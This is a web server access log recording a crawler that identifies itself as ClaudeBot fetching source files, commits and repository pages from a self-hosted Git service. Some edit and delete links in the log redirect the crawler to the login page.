"/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/README.md" [Client 216.73.216.188] [Length 3505] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/static" [Client 216.73.216.188] [Length 10633] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/updateRecord.md" [Client 216.73.216.188] [Length 935] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/QUICKSTART.md" [Client 216.73.216.188] [Length 12759] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3?files=asset_pilot_docker" [Client 216.73.216.188] [Length 60700] [Gzip 8.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/tsconfig.json" [Client 216.73.216.188] [Length 11848] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker" [Client 216.73.216.188] [Length 15977] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/metadata.json" [Client 216.73.216.188] [Length 9768] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/find/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2" [Client 216.73.216.188] [Length 7500] [Gzip 2.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets" [Client 216.73.216.188] [Length 10856] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/status.json" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/status.json" [Client 216.73.216.188] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/status.json" -[15/Feb/2026:09:30:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/README.md" [Client 216.73.216.188] [Length 11301] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/index.tsx" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/.Backup/html" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/index.tsx" -[15/Feb/2026:09:30:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/global.json" [Client 216.73.216.188] [Length 43] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/.Backup/html" -[15/Feb/2026:09:30:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json?display=source" [Client 216.73.216.188] [Length 13039] [Gzip 4.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/updateRecord.md?display=source" [Client 216.73.216.188] [Length 18840] [Gzip 4.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/main.py" [Client 216.73.216.188] [Length 10253] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f" [Client 216.73.216.188] [Length 10394] [Gzip 3.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/find/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96" [Client 216.73.216.188] [Length 7515] [Gzip 2.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/components/Services.tsx" [Client 216.73.216.188] [Length 14863] [Gzip 4.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/metadata.json" [Client 216.73.216.188] [Length 812] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Properties" [Client 216.73.216.188] [Length 10134] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/requirements.txt" [Client 216.73.216.188] [Length 11416] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcompare%2Fmain...main" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2" [Client 216.73.216.188] [Length 10593] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/updateRecord.md" [Client 216.73.216.188] [Length 9631] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/Program.cs" [Client 216.73.216.188] [Length 9875] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96" [Client 216.73.216.188] [Length 10572] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/services" [Client 216.73.216.188] [Length 10179] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/main.py" [Client 216.73.216.188] [Length 1923] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/init_db.py?display=rendered" [Client 216.73.216.188] [Length 11169] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/global.json?display=source" [Client 216.73.216.188] [Length 11120] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/metadata.json" [Client 216.73.216.188] [Length 11523] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer?page=1&tab=activity" [Client 216.73.216.188] [Length 10309] [Gzip 5.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/status.json" [Client 216.73.216.188] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/.TemporaryDocument/QUICKSTART.md" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/status.json?display=source" [Client 216.73.216.188] [Length 11064] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/.TemporaryDocument/QUICKSTART.md" -[15/Feb/2026:09:30:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/updateRecord.md" [Client 216.73.216.188] [Length 9921] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/database.sqlite?display=rendered" [Client 216.73.216.188] [Length 10878] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Program.cs?display=rendered" [Client 216.73.216.188] [Length 10937] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/Dockerfile" [Client 216.73.216.188] [Length 9820] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/README.md" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/OpcUaMinimal.csproj" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/status.json" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/README.md" -[15/Feb/2026:09:30:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/OpcUaMinimal.csproj" -[15/Feb/2026:09:30:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/updateRecord.md" [Client 216.73.216.188] [Length 9631] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/status.json" -[15/Feb/2026:09:30:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html" [Client 216.73.216.188] [Length 14780] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/docker-compose.yml" [Client 216.73.216.188] [Length 13561] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/update_status.py" [Client 216.73.216.188] [Length 12947] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/OpcConnectionTest.csproj?display=rendered" [Client 216.73.216.188] [Length 10931] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/Program.cs" [Client 216.73.216.188] [Length 2209] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker" [Client 216.73.216.188] [Length 16003] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/types.ts" [Client 216.73.216.188] [Length 11479] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/metadata.json?display=source" [Client 216.73.216.188] [Length 11504] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 216.73.216.188] [Length 15799] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/main.py" [Client 216.73.216.188] [Length 13952] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/requirements.txt" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/app" [Client 216.73.216.188] [Length 10245] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/requirements.txt" -[15/Feb/2026:09:30:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs?display=rendered" [Client 216.73.216.188] [Length 11014] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/Dockerfile" [Client 216.73.216.188] [Length 943] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/.TemporaryDocument/QUICKSTART.md" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/.TemporaryDocument/QUICKSTART.md" -[15/Feb/2026:09:30:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/main.py?display=source" [Client 216.73.216.188] [Length 25658] [Gzip 7.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/Program.cs?display=source" [Client 216.73.216.188] [Length 13936] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj" [Client 216.73.216.188] [Length 11492] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/archive/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa.zip" 